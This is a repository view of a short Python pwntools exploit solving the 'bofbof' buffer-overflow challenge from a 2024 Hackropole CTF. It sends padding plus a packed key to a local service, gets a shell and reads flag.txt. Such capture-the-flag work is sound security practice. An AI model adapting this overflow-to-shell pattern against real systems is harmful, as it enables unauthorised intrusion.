Files
ctf/2024/hackropole/pwn/bofbof/exploit.py
2025-06-06 03:13:31 +02:00

12 lines
397 B
Python

from pwn import remote, log, p64, time
with remote("localhost", 4000, fam="ipv4") as p:
key = 0x1122334455667788
payload = b"\x00" * 0x28 + p64(key)
log.info(f"Sending payload {payload} | len: {hex(len(payload))}")
p.sendline(payload)
# wait for system to spawn a shell
time.sleep(0.1)
p.sendline(b"cat flag.txt")
log.info(p.recvregex(b"FCSC\{[0-9a-fA-F]{64}\}"))